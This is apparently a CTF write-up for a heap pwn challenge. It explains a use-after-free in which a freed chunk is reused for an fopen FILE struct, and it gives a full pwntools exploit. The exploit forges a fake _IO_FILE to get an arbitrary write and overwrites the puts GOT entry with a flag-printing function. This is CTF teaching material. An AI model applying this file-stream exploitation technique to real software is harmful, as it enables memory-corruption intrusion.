When creating the temporary name, our initial object gets freed, which lets malloc hand that same chunk back for the `IO_FILE` struct allocated by `fopen()`. Basically a UAF.

The PoC below overwrites the GOT entry of `puts` with the address of a function that cats the flag.
We get an arbitrary write primitive by modifying the `BUF_BASE` and `BUF_END` fields so that they point at the `puts` GOT entry.

```python
from pwn import *

distance_to_fd = 0x70                 # offset of _fileno inside the FILE struct
win_func = 0x00000000004008a7         # function that cats the flag
puts_got = 0x00601020                 # GOT entry of puts

# Fake _IO_FILE struct; must be bytes for Python 3 pwntools
fake_struct = b""
fake_struct += p32(0xFBAD2088)        # FLAG &~_IO_NO_READS
fake_struct += p32(0)
fake_struct += p64(0)                 # READ_PTR
fake_struct += p64(0)                 # READ_END
fake_struct += p64(0)                 # READ_BASE
fake_struct += p64(0)                 # WRITE_BASE
fake_struct += p64(0)                 # WRITE_PTR
fake_struct += p64(0)                 # WRITE_END
fake_struct += p64(puts_got)          # BUF_BASE
fake_struct += p64(puts_got + 0x142)  # BUF_END
fake_struct += p64(0)                 # save_base
fake_struct += p64(0)                 # backup_base
fake_struct += p64(0)                 # save_end
fake_struct += p64(0)                 # markers
fake_struct += p64(0)                 # chain
# pad with zeros up to the _fileno field (integer division for Python 3)
fake_struct += p64(0x0) * ((distance_to_fd - len(fake_struct)) // 8)
fake_struct += p64(0)                 # FD_NO = STDIN

r = remote("chal1.swampctf.com", 2050)
r.recvuntil(b"?")

r.sendline(b"1")
r.sendline(b"DEADBEEF")
r.recvuntil(b"new name")
r.sendline(fake_struct)
r.recvuntil(b"void!!")
r.sendline(p64(win_func))
r.interactive()
```

References: [here](https://dangokyo.me/2018/01/01/advanced-heap-exploitation-file-stream-oriented-programming/) and [here](https://www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique)